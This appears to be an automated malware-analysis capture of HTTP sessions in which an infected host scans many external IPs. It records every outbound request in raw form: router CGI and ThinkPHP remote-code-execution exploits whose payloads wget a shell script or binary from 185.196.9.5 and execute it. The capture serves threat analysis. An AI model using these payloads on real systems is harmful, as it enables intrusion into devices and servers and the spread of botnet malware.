Feb 25, 2024 19:02:58.075737000 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
203	192.168.2.15	55416	95.86.66.227	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:58.271339893 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
204	192.168.2.15	34782	94.183.207.174	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:58.353441954 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
205	192.168.2.15	48802	85.25.1.12	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:59.021644115 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:02:59.294085979 CET	421	IN	HTTP/1.1 404 Vary: Origin Vary: Access-Control-Request-Method Vary: Access-Control-Request-Headers Content-Disposition: inline;filename=f.txt Content-Type: application/json Transfer-Encoding: chunked Date: Sun, 25 Feb 2024 18:02:59 GMT Keep-Alive: timeout=60 Connection: keep-alive Data Raw: 36 63 0d 0a 7b 22 74 69 6d 65 73 74 61 6d 70 22 3a 22 32 30 32 34 2d 30 32 2d 32 35 54 31 38 3a 30 32 3a 35 39 2e 32 30 31 2b 30 30 3a 30 30 22 2c 22 73 74 61 74 75 73 22 3a 34 30 34 2c 22 65 72 72 6f 72 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 2c 22 70 61 74 68 22 3a 22 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 22 7d 0d 0a Data Ascii: 6c{"timestamp":"2024-02-25T18:02:59.201+00:00","status":404,"error":"Not Found","path":"/cgi-bin/ViewLog.asp"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
206	192.168.2.15	46022	31.136.135.124	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:59.025239944 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:02:59.590178967 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:00.710289001 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:03.142137051 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:07.750267982 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:16.710298061 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:34.885874033 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:11.749659061 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
207	192.168.2.15	38136	85.163.108.40	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:59.039935112 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
208	192.168.2.15	50574	94.120.239.226	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:59.069385052 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
209	192.168.2.15	46290	94.121.68.58	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:59.071513891 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
210	192.168.2.15	55998	88.198.166.119	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:59.438342094 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:02:59.625603914 CET	513	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:02:59 GMT Server: Apache X-Robots-Tag: noindex, nofollow, noarchive Content-Length: 303 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 64 65 64 69 76 69 72 74 31 38 36 37 2e 79 6f 75 72 2d 73 65 72 76 65 72 2e 64 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache Server at dedivirt1867.your-server.de Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
211	192.168.2.15	58760	62.72.36.13	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:59.580873966 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:10.822418928 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:10.994736910 CET	207	IN	HTTP/1.1 404 Not Found Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Sun, 25 Feb 2024 18:03:10 GMT Content-Length: 19 Connection: close Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found

Session ID	Source IP	Source Port	Destination IP	Destination Port
212	192.168.2.15	56270	95.100.231.150	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:00.522561073 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:00.784666061 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Sun, 25 Feb 2024 18:03:00 GMT Date: Sun, 25 Feb 2024 18:03:00 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 35 64 37 65 31 39 62 38 26 23 34 36 3b 31 37 30 38 38 38 34 31 38 30 26 23 34 36 3b 33 36 66 38 36 39 32 38 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.5d7e19b8.1708884180.36f86928</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
213	192.168.2.15	35820	95.85.15.8	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:00.993849039 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
214	192.168.2.15	35404	95.211.52.84	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:00.998425007 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:01.180021048 CET	307	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sun, 25 Feb 2024 18:03:01 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
215	192.168.2.15	39074	95.111.255.30	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:01.003981113 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:01.191485882 CET	355	IN	HTTP/1.1 400 Bad Request Server: nginx/1.14.0 (Ubuntu) Date: Sun, 25 Feb 2024 18:03:41 GMT Content-Type: text/html Content-Length: 182 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
216	192.168.2.15	42028	95.110.146.110	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:01.017364979 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:01.218434095 CET	427	IN	HTTP/1.1 400 Bad Request Date: Mon, 26 Feb 2024 01:03:00 GMT Server: Apache X-Frame-Options: DENY Content-Length: 226 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
217	192.168.2.15	56296	95.100.231.150	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:01.117043972 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:02.036268950 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:02.303163052 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Sun, 25 Feb 2024 18:03:02 GMT Date: Sun, 25 Feb 2024 18:03:02 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 34 39 37 65 31 39 62 38 26 23 34 36 3b 31 37 30 38 38 38 34 31 38 32 26 23 34 36 3b 35 64 61 32 64 62 35 65 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.497e19b8.1708884182.5da2db5e</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
218	192.168.2.15	51920	95.101.20.68	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:01.244868040 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
